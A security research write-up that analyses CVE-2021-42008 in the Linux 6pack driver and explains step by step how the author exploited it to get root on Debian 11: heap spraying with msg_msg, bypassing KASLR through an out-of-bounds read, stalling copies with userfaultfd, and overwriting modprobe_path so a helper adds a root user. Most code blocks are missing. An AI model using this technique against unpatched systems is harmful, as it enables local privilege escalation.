CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access. In this article, after analyzing the vulnerability, we will exploit it using the techniques FizzBuzz101 and me presented in our recent articles Fire Of Salvation and Wall Of Perdition, bypassing all modern kernel protections, then, we will evaluate other approaches to perform privilege escalation.
Overview
6pack is a transmission protocol for data exchange between a PC and a TNC (Terminal Node Controller) over a serial line. It is used as an alternative to the KISS protocol for networking over AX.25. AX.25 is a data link layer protocol extensively used on amateur packet radio networks (and interestingly by some satellites, for example 3CAT2).
The vulnerability we are going to exploit, was introduced by commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 with the introduction of the 6pack driver back in 2005. It was found by Syzbot and recently fixed by commit 19d1532a187669ce86d5a2696eb7275310070793. Every kernel version before 5.13.13 that has not been patched, is affected.
As we mentioned in the introduction, the vulnerability is caused by a
missing size validation check in the
decode_data()
function. A malicious input received over the sixpack channel from a
process with CAP_NET_ADMIN
capability, can cause the
decode_data()
function to be called multiple times by
sixpack_decode().
The malicious input is subsequently decoded and stored into a buffer,
cooked_buf,
in the
sixpack
structure. The variable
rx_count_cooked
is used as index in cooked_buf
, it basically determines where a
decoded byte must be written.
The problem is that if decode_data()
is called multiple times, the rx_count_cooked
variable is incremented
over and over, until it exceeds the size of cooked_buf
, which can
contain a maximum of 400
bytes. This can result in a a
Slab-Out-Of-Bounds Write vulnerability, which if properly exploited, can
lead to root access.
To exploit the vulnerability, we are going to target one of the latest
Debian 11 versions. It can be downloaded from
here.
The exploit is designed and tested for kernel
5.10.0-8-amd64
. All modern protections, such as
KASLR
, SMEP
, SMAP
, PTI
,
CONFIG_SLAB_FREELIST_RANDOM
,
CONFIG_SLAB_FREELIST_HARDENED
, CONFIG_HARDENED_USERCOPY
etc. are enabled.
Analyzing The Vulnerable Driver
In modern Linux distributions, 6pack is usually compiled as a Loadable
Kernel Module. The module can be loaded into kernel by setting the line
discipline of a tty to
N_6PACK.
To do so, we can simply create a
ptmx/pts
pair, respectively the master side and the slave side of a
pty and set the line discipline of
the slave to N_6PACK
:
|
|
After opening a ptmx and the
respective slave side, we set the line discipline of the pts to
N_6PACK
[1] using the function set_line_discipline()
[2].
Line discipline, also known as LDISC, acts as an intermediate level between a character device and a pseudo terminal (or real hardware), determining the semantics associated with the device.
For example, the
line discipline is responsible for the association of a special
character like ^C
entered by the user in a terminal pressing
CTRL + C
, to a specific signal, SIGINT
in this case. To learn more
about tty, pty, ptmx/pts and ldsc I recommend you to read The TTY
demystified.
Once we set the pts line discipline to N_6PACK
, the 6pack driver is
initialized by
sixpack_init_driver():
and tty_register_ldisc() is called to register the new line discipline [1]. The second argument, sp_ldisc, is defined as:
Afterwards the sixpack channel is opened by sixpack_open():
|
|
From the source code above, we can see that only a process with
CAP_NET_ADMIN
capability is allowed to interact with the 6pack
driver [1]. Fortunately, this makes the vulnerability not so
easily exploitable in the wild.
Then, a net device is allocated using alloc_netdev() which is a macro for alloc_netdev_mqs() [2]:
|
|
As we can see from the alloc_netdev_mqs()
source code, first, it
calculates the size of a
net_device
structure, 0x940 bytes
in our case, [2.1] and then it adds the value of
sizeof_priv
to it, which corresponds to the size of a sixpack
structure, 0x270 bytes
in our case. [2.2] After alignment, this will
result in an allocation of 0xbcf bytes
, that will end up in
kmalloc-4k
. [2.3]
Back to sixpack_open()
, right after the call to
alloc_netdev()
,
netdev_priv()
is called: it sets the location of the sixpack
structure inside the
private data region of the previously allocated net device [3].
Finally, after setting the status
field of the sixpack
structure
to 1
[4] and initializing two timers (the function called
when the second timer expires, resync_tnc()
, will be extremely
important in the exploitation phase) [5], the tty line is linked
to the sixpack channel [6], the net device is registered, and
tnc_init()
is called [7]:
Among other things, tnc_init()
sets the expiration time of the
sp->resync_t
timer to
jiffies + SIXP_RESYNC_TIMEOUT
[1].
In the Linux Kernel,
jiffies
is a global variable that stores the number of ticks occurred since the
system boot-up. The value of this variable is incremented by one for
each timer interrupt. In one second, there are HZ
ticks (the value
of HZ
is determined by
CONFIG_HZ).
Since we know
that HZ = number of ticks/sec
and
jiffies = number of ticks
, we can simply convert
jiffies to seconds sec = jiffies/HZ
and seconds to
jiffies jiffies = sec*HZ
.
This is exactly what the Linux Kernel does to determine when a timer
expires. For example, a timer that expires in 10 seconds
from now
can be represented in jiffies using
jiffies + (10*HZ)
.
In our case, the timer is set to
jiffies + SIXP_RESYNC_TIMEOUT
.
SIXP_RESYNC_TIMEOUT
is equal to 5*HZ
. This means that once the sixpack
channel is initialized, the timer will expire after 5 seconds
, triggering a call to resync_tnc()
. We will analyze this function during the exploitation phase.
Reaching The Vulnerable Function
Now that we can communicate with the sixpack
driver, when we write
to the ptmx,
sixpack_receive_buf()
is called, which in turn calls
sixpack_decode():
|
|
The various macros are defined in 6pack.c:
#define SIXP_FOUND_TNC 0xe9
#define SIXP_PRIO_CMD_MASK 0x80
#define SIXP_PRIO_DATA_MASK 0x38
#define SIXP_RX_DCD_MASK 0x18
#define SIXP_DCD_MASK 0x08
sixpack_decode()
will loop through the buffer we sent over the
sixpack channel, now stored in pre_rbuff
[1], and based on
the value of each byte (inbyte
), it will take different paths.
To reach the vulnerable function, decode_data()
, we must force
sixpack_decode()
to take the last path, [4] and to do so, we
need to satisfy multiple conditions:
A. inbyte & SIXP_PRIO_CMD_MASK
must be zero,
otherwise decode_prio_command()
will be called instead of
decode_data()
[2].
B. inbyte & SIXP_STD_CMD_MASK
must be zero,
otherwise decode_std_command()
will be called instead of
decode_data()
[3].
C. sp->status & SIXP_RX_DCD_MASK
must be equal
to SIXP_RX_DCD_MASK
[4].
We control the value of each byte in our buffer, the first two conditions can be easily satisfied. The most complex one to satisfy is C.
When a sixpack
structure is initialized by sixpack_open()
, the
status
variable is set to 1
. Although we have no direct control
over this variable, we can still indirectly modify it by taking the
decode_prio_command()
path [2]:
|
|
When decode_prio_command()
is called, if we satisfy the first
check [1], we can control sp->status
exploiting the
line sp->status = cmd & SIXP_PRIO_DATA_MASK
[4], which is exactly what we need since we control the value of
cmd
.
Easy, right? No. We have a problem. If the second check is satisfied [2], the
SIXP_RX_DCD_MASK
bits are zeroed out from our cmd
variable by
the line cmd &= ~SIXP_RX_DCD_MASK
[3], but
since we need to satisfy condition C to reach the vulnerable
function decode_data()
, the second part of the second check
(cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK
[2] will inevitably be satisfied and the same applies to the first
part of the check
(sp->status & SIXP_DCD_MASK) == 0
since when decode_prio_command()
is called for the first time, sp->status
is
equal to 1
.
Fortunately, we can easily work around the problem by calling
decode_prio_command()
twice: The first time, we set
sp->status
to a certain value, such that when decode_prio_command()
is called again, the first part of the second check
(sp->status & SIXP_DCD_MASK) == 0
[2] is not satisfied. Then, calling decode_prio_command()
again
with a specific value as input, we will be able to skip the line
cmd &= ~SIXP_RX_DCD_MASK
[3] and set
sp->status
to a value that can satisfy condition C.
The following python script will compute the correct bytes for us:
|
|
Executing the script above we will get the following result:
[*] First call to decode_prio_command():
Input: 0x88 => s->status = 0x8
[*] Second call to decode_prio_command():
Input: 0x98 => s->status = 0x18
It means that if decode_prio_command()
is called the first time
using 0x88
as input, sp->status
will be set to 0x8
, then,
calling the function again using 0x98
as input, the second check
will not be satisfied [2] because sp->status
will be equal to
8
and (8 & SIXP_DCD_MASK) != 0
, and we will be
able skip the line cmd &= ~SIXP_RX_DCD_MASK
[3] and set sp->status
to 0x18
exploiting the line
sp->status = cmd & SIXP_PRIO_DATA_MASK
[4].
At this point we can satisfy condition C,
(sp->status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK
,
in sixpack_decode()
, and reach the vulnerable function
decode_data()
. Let’s proceed examining its source code:
|
|
For our discussion, we also need to take into account the following fields of the sixpack structure:
Every time decode_data()
is called, one byte is copied from our
buffer to sp->raw_buf
[1]. When sp->raw_buf
contains
three bytes and decode_data()
is called again, these three bytes
are decoded and copied from sp->raw_buf
to another buffer,
sp->cooked_buf
[2]. As we can see from the sixpack
structure above, this buffer can contain a maximum of 400
bytes. The
variable sp->rx_count_cooked
is used as index in
sp->cooked_buf
and it is incremented after each byte is written
into it.
From an attacker prospective, knowing that your payload will pass
through this function is not fun at all. Luckily we can reuse some
parts of the
encode_sixpack()
function in our exploit to encode the malicious payload, this way, once
received by sixpack_decode()
it will be decoded by
decode_data()
and we will be able to control values in memory.
Here is the encode_sixpack()
part we are interested in:
|
|
Now that we know how to reach the vulnerable function, we can finally start planning our exploit.
Exploitation Plan
The first thing to consider is the layout of the sixpack
structure
in memory. Let’s take a look to its source code again:
As we can see, if we manage to overflow the cooked_buf
array
[1], we will inevitably overwrite the rx_count
variable
[2] and the rx_count_cooked
variable [3] in memory.
Here is a visual representation:
We know that rx_count_cooked
is used as index in
cooked_buf
by decode_data()
, therefore if we do the math correctly, we
can use the overflow to set it to a large value, this way we should be
able to trick decode_data()
into continuing to write the decoded payload in the next
object in memory.
Now, assuming we can achieve this goal, we need an object that we can
spray in kmalloc-4k
, and once corrupted by our Out-Of-Bounds Write can give us arbitrary read and
arbitrary write. At this point, if you have read my latest article, you
already know that
msg_msg
is exactly what we need:
In our recent articles, Fire Of
Salvation
and Wall Of Perdition,
FizzBuzz101 and me, have extensively
discussed how to utilize msg_msg
objects to achieve arbitrary read
and arbitrary write.
Before continuing, I recommend
you to read these articles to better understand how this object can be
exploited. I will continue assuming you already know how
msg_msg
objects can be utilized in kernel exploitation.
If we manage to get a msg_msg
object allocated next to the
sixpack
structure, and the respective segment allocated in
kmalloc-32
, we can corrupt the m_ts
field of the message [1] (which
determines its size) with our Out-Of-Bounds Write primitive, setting it
to a large value. This way, using
msgrcv(), we will be able to obtain a Out-Of-Bounds Read
primitive in kmalloc-32
, get an information leak and bypass KASLR
.
Similarly, to achieve arbitrary write, we can spray many msg_msg
objects in kmalloc-4k
and their
respective segments in kmalloc-32
, then for each object we can suspend the call to
copy_from_user()
in
load_msg()
using
userfaultfd
(there are alternatives to userfaultfd
, we will discuss them in the
Conclusion section). Afterwards, once one of these messages is allocated
right after our sixpack
structure, we corrupt its next
pointer [2],
setting it to the address where we want to write.
In our exploit, we will target modprobe_path, but there are many other valid targets, for example the current task’s cred structure.
Once the copy_from_user()
calls will be released, we will able to replace the modprobe_path
string with the path of a malicious binary, and
trick the kernel into executing the program that will give us
root privileges.
At this point, with this plan in mind, we are ready to start writing our exploit!
The Exploit
First of all we need to do some calculations to get the distance between
sp->cooked_buf
and sp->rx_count_cooked
, and the distance
between sp->cooked_buf
and the next object in memory. In our case,
the address of sp->rx_count_cooked
corresponds to
sp->cooked_buf[0x194]
and the address of the next object in
memory corresponds to sp->cooked_buf[0x688]
.
Since we know that sp->rx_count_cooked
is used as index inside sp->cooked_buf
, if we want to write to the next object in memory, we need to set its
value to x
, where x >= 0x688
.
Again: easy, right? No. We need to consider the effect of GCC
optimizations on the vulnerable function decode_data()
:
|
|
|
|
The first important thing to note is that predictably, when
decode_data()
is called, and sp->raw_buf
contains 3 bytes,
GCC optimized the access to sp->rx_count_cooked
, so instead of
accessing its value multiple times during the write procedure, it is
stored in EAX
[1] and then it moved it to RCX
[2] at
the beginning of the function.
The second important thing is that instead of three consecutive write
operations in sp->cooked_buf
, before writing the third decoded
byte [6], the value of sp->rx_count_cooked
is updated with
its previously stored [1] [2] value + 3
[5].
This optimization makes things harder, because if we manage to overwrite the
first two bytes of sp->rx_count_cooked
thanks to the instructions
[3] and [4], before overwriting the third byte [6],
its value will be updated by instruction [5].
It means that we need to try to use the third write operation [6]
to overwrite the second byte of sp->rx_count_cooked
that
corresponds to sp->cooked_buf[0x195]
, for example making it
0x06XX
instead of 0x01XX
.
Since decode_data()
is writing 3 bytes at time starting from index
0 into sp->cooked_buf
, each time decode_data()
is called, the
third byte will be written at index 0x2, 0x5, 0x8, …, 0x191, 0x194 and
so on. Basically when sp->rx_count_cooked
is 0x192
and
decode_data()
is called again, the third write operation will be
performed over sp->cooked_buf[0x194]
, but with the third decoded byte we need to overwrite
sp->cooked_buf[0x195]
! Oh, lovely GCC optimizations…
The problem can be solved misaligning the writing frame by setting the first byte of
sp->rx_count_cooked
to 0x90
, so it will become 0x190
.
This way, after two more calls to decode\_data()
the third write
operation will be performed over sp->cooked_buf[0x195]
.
Each time decode_data()
is called, we basically have a pattern of
three operations:
-
First, when
sp->rx_count_cooked
is equal to0x192
anddecode_data()
is called again, it writes the first two bytes with instruction [3] and [4] respectively atsp->cooked_buf[0x192]
andsp->cooked_buf[0x193]
. -
Then instruction [5] updates
sp->rx_count_cooked
with its previously stored value + 3:0x192 + 3
:0x195
. -
And finally the third write operation [6] overwrites the first byte of
sp->rx_count_cooked
which corresponds tosp->cooked_buf[0x194]
, making it0x190
.
Here is a visual representation:
Now sp->rx_count_cooked
is equal to 0x190
, and we
successfully misaligned the writing frame. When decode_data()
is
called again, we have the same pattern of operations:
- Write two bytes inside
sp->cooked_buf
(this time atsp->cooked_buf[0x190]
andsp->cooked_buf[0x191]
) - Update
sp->rx_count_cooked
with its previously stored value + 3 (this time0x190 + 3
:0x193
) - Write the third byte (this time at
sp->cooked_buf[0x192]
):
And again, a new call to decode_data()
will finally set
sp->rx_count_cooked
to 0x696
. The pattern is always the same:
- Write two bytes inside
sp->cooked_buf
(this time atsp->cooked_buf[0x193]
andsp->cooked_buf[0x194]
) - Update
sp->rx_count_cooked
with its previously stored value + 3 (this time 0x193 + 3: 0x196) - Write the third byte (this time at
sp->cooked_buf[0x195]
):
This will trick decode_data()
into continuing to write the payload
0x0e bytes
inside the next object in memory. At this point we can
start writing our exploit:
|
|
Since we are working in a SMD environment and with the SLUB allocator active slabs are managed per-cpu (see kmem_cache_cpu), we need to make sure to operate always on the same processor to maximize the success rate of our exploit. We can do this by assigning the current process to core 0 [1] using sched_setaffinity() [2] which is usable by unprivileged users.
Then we call
prepare_exploit()
to prepare everything we need to exploit
modprobe
[3] (Check References to learn more about this
technique or read my Hotrod writeup).
As you can see once executed by the kernel, the program will add a new user with root privileges [4].
|
|
We can continue spraying many shm_file_data structures in kmalloc-32:
This can be done using shmget() to
allocate a shared memory segment and
shmat() to attach it to the address
space of the calling process [1]. This, later on, will allow us to leak the
init_ipc_ns
symbol, located in the kernel data section, calculate the kernel base address, and
bypass KASLR
.
Afterwards, we allocate N_MSG
(in this case N_MSG
is equal to
6
) message queues [2] and then for each queue we send a
message of 0x1018
bytes (0xfe8 bytes for message body, and 0x30 for
message header) using send_msg()
[3], a
msgsnd() wrapper. Each iteration will
allocate a message in kmalloc-4k
and a segment in kmalloc-32
.
PS: Here I only used 6 messages because the testing environment was virtually noiseless. On other systems you may want to use more message queues and spray more messages to saturate kmalloc-4k partial slabs first.
Then we use recv_msg()
, a
msgrcv() wrapper, to read a message a
create a hole in the kernel heap [4]. At this point we can finally
initialize the sixpack channel as we have seen in the first section. [5]
This will allocate a net_device
structure in kmalloc-4k
and a
sixpack
structure inside its private data region.
All this will create the following situation in memory, where
the sixpack
structure is followed by one of the messages. This message contains a pointer to its respective
segment in kmalloc-32:
It is important to note that we don’t know which queue the
message allocated after the sixpack
structure belongs to, so I
identified the queue with QID #X
.
We are finally ready to send our malicious payload over the sixpack channel:
|
|
We generate and encode our malicious payload calling
generate_paylaod()
[1]. As we have seen in the previous
paragraphs, we misalign the writing frame of the decode_data()
function by setting sp->rx_count_cooked
to 0x190
[2].
We overwrite the second byte of sp->rx_count_cooked
with
0x6
, making it 0x696
[3]. From this point on,
decode_data()
will continue writing data at
sp->cooked_buf[0x696]
and by doing so it will inevitably corrupt
the two upper bytes of the msg_msg.m_list.prev
pointer. Since we
know that the two upper bytes of a heap pointer in kernel space are
always 0xffff
, we can easily fix the issue [4].
Then we set
msg_msg.m_ts
to 0x1100
[5], this will allow us to obtain an Out-Of-Bounds Read primitive calling recv_msg()
. For now
we don’t need to overwrite msg_msg.next
[6], so we can
directly encode our buffer [7], and set the first two bytes of the
payload respectively to 0x88
, and 0x98
, to reach the vulnerable function.
Since we are skipping the first two bytes, we
set sp->rx_count
to 2
in sixpack_encode()
[8].
Once we send our malicious payload over the sixpack channel [9], it will be decoded by sixpack_decode()
resulting in the following situation in memory:
We have successfully overwritten sp->rx_count_cooked
with
0x696
exploiting the buffer overflow in sp->cooked_buf
, and
tricked decode_data()
into writing our malicious
payload at sp->cooked_buf[0x696]
.
By doing so, we successfully
overwritten the m_ts
field of the message. Here is the result of
our Out-Of-Bounds Write primitive showed in GDB:
We can proceed exploiting the Out-Of-Bounds Read:
|
|
Since we don’t now which queue the message allocated after the
sixpack
structure belongs to, we use leak_pointer()
[1] to read each message, until the init_ipc_ns
pointer is found
[2]. If we find the pointer, we obtain the correct queue id comparing the message content using find_message_queue()
[3], and we finally
compute the address of modprobe_path
[4].
If the procedure fails, it
means that none of our messages has been allocated after the sixpack
structure. In this case we can simply launch the exploit again.
Here is a visual representation of what happens when we trigger the Out-Of-Bounds Read:
Now that we know the address of our target modprobe_path
, we need
to get an arbitrary write primitive. We could proceed initializing a new
sixpack
structure, but this would decrease the success rate of our
exploit.
The question is: is there a way to reuse the sixpack
structure we just corrupted? The answer is yes! Remember when we
analyzed the tnc_init()
function? Well, when a new sixpack channel
is initialized, tnc_init()
sets a timer of 5 seconds
. When the
timer fires,
resync_tnc()
is called:
|
|
As we can see, after 5 seconds,
the receiver state is reset, meaning that sp->rx_count
and
sp->rx_count_cooked
are set to 0
[1] [2] and
sp->status
to 1
[3], then the 5 seconds timer is re-initialized [4].
This means that we only need to wait 5 seconds until the receiver state is reset, then we will be able to reuse the structure to cause a second Out-Of-Bounds Write.
We can proceed initializing N_THREADS
page fault handler threads
(in our case N_THREADS
is equal to 8
):
|
|
First, we call mmap()
for 8 times, and each time we map 3 pages of
memory. For each iteration we start monitoring the second page
using userfaultfd
[1]. Then, we start 8 page fault handlers
[2]. Each of these threads will handle a page fault for a
specific page.
We can proceed allocating 8 messages in kmalloc-4k and the respective segments in kmalloc-32:
|
|
First, we free the message allocated after the sixpack
structure and respective segment, closing the queue [1]. This will create a hole in the heap,
allowing us to allocate another message at the same location (because of
freelist LIFO behavior).
We re-generate our malicious payload, this time
using modprobe_path - 0x8
as target [2]. This will set the
msg_msg.next
pointer to modprobe_path - 0x8
. Here we are
subtracting 8 bytes from modprobe_path
because the first QWORD of a
segment must be NULL, otherwise load_msg()
will try to access the
next segment causing a crash.
Afterwards, we create 8 threads using
create_message_thread()
[3]. Each one of these threads will
allocate a new message in kmalloc-4k
. For each thread, we place
the message buffer, right 0x10 bytes before the monitored page
[4], this way the copy_from_user()
call in load_msg()
will cause a page fault, and we will be able suspend the copy operation.
Finally we sleep for 6 seconds [5], allowing resync_tnc()
to reset the
sixpack
receiver state. All this will cause the following situation in memory:
As we can see, one of the messages has been allocated right after the
sixpack
structure. load_msg()
caused a page fault, and we successfully suspended
the copy operation. It is important to note that even in this case we
don’t know which queue the message allocated after the sixpack
structure belongs to, so I identified the queue with QID #Y
.
We are ready to send our malicious payload over the sixpack
channel:
Once we send it [1], it will
overwrite multiple fields of the msg_msg
structure, including the
next
pointer. Now msg_msg->next
, points to modprobe_path - 0x8
:
We can finally release all page faults:
The modprobe_path
string will be overwritten with the path of
our malicious program "/tmp/x"
:
In the final stage, we trigger the call to modprobe, and we verify if the new user with root privileges has been added:
First we execute a program with an unknown program header [1]
forcing the kernel into calling
__request_module()
→
call_modprobe()
→
call_usermodehelper_exec()
and executing our malicious program, then we check if the user pwn
[2] has been added using
getpwnam(). If the user exists,
we can use su pwn
to become root, otherwise we simply need to launch
the exploit again.
Here is the exploit in action:
The complete exploit can be found here:
CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver
The exploit is designed and tested for
Debian 11 - Kernel 5.10.0-8-amd64
. If you want to
port the exploit to other kernel versions, remember that the distance
between sp->cooked_buf
and the next object in memory may change.
Conclusion
In this article I showed how the techniques presented by FizzBuzz101 and me with Fire of Salvation and Wall Of Perdition can be used to exploit real vulnerabilities in the Linux Kernel.
There are many other valid
approaches to exploit this vulnerability. For example, after Kernel
5.11, a first
patch
made userfaultfd
completely inaccessible for unprivileged users,
then a second
patch
restricted its usage in a way that only page faults from user-mode can
be handled, so in the second stage, an attacker may simply use
FUSE
to delay page faults creating unprivileged user+mount
namespaces, or
may abuse discontiguous file mapping and scheduler
behavior
instead of using userfaultfd.
Another approach for the second stage may
be to set msg_msg.next
to the address of a previously leaked
structure, for example
seq_operations,
subprocess_info,
tty_struct
and so on (check References for a list of exploitable kernel
structures), and then free the message and its respective segment (now
pointing to the target structure) using msgrcv()
without the
MSG_COPY
flag.
This will result in an arbitrary free primitive. From here it is possible to cause a Use-After-Free and hijack the Kernel control flow overwriting a function pointer.
Another very interesting approach is the one used to exploit CVE-2021-22555.
As always, for any question or clarification, feel free to contact me (check About).
References
6pack
The TTY demystified
Jiffies in the Linux Kernel
Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
- https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)
modprobe_path
Exploitable kernel structures